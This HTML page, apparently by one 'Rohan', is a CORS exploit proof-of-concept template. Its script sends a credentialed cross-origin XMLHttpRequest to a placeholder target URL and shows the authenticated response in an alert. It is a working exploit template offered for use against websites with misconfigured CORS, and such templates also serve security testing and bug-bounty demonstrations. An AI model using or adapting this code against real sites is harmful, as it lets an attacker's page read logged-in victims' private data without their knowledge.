<html>
<!--Written by Rohan at rohanwebsite.in-->
<head>
	<title>CORS Exploit by Rohan</title>
</head>
<style>
body {
	background-color: #95B9C7;
	background-repeat: no-repeat;
	background-position: center;
}
.info {
	margin: 110px;
	padding: 0 90px 0 200px;
	font-family: "Times", serif;
	color: white;
	
}
#Exploit
{
	padding: 0 20px 0 200px;
	margin-top: 200px;
	width: 500px;
	text-align: center;
	font-family: "Times", serif;
	color: white;
}
.button {
  background-color: #f9c963;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 25px;
  margin: 44px 2px;
  cursor: pointer;
  border-radius: 8px;
}

select {
  width: 100%;
  padding: 16px 20px;
  border: none;
  border-radius: 4px;
  background-color: #f1f1f1;
}
input[type=text] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
  border-radius: 8px;
}
label {
    color: White;
    font-weight: bold;
    font-size: 40px;
    display: block;
    float: left;
    font-family: "Calibri", Times, serif;
}
</style>
<body>
<br>
<center><font size = 15><a href="https://rohanwebsite.in">Rohan's</a> </FONT><FONT size = 15 COLOR = WHITE> CORS </font> <font size = 15 COLOR = ORANGE>Exploit!</font></center>
<div class="info">
	<div id="Exploit">
		<font size = 13>Click the Button below for CORS PoC</font>
		<div id="demo">
		<button type="submit" onclick="cors()" class="button">Click Me to Exploit CORS</button>
		</div>
	</div>
		<script>
			function cors() {
			  var xhttp = new XMLHttpRequest();
			  xhttp.onreadystatechange = function() {
				if (this.readyState == 4 && this.status == 200) {
				  document.getElementById("demo").innerHTML = alert(this.responseText);
				}
			  };
xhttp.open("GET", "<enter-target-url-here", true);
			  xhttp.withCredentials = true;
			  xhttp.send();
			}
		</script>
</body>
</html>
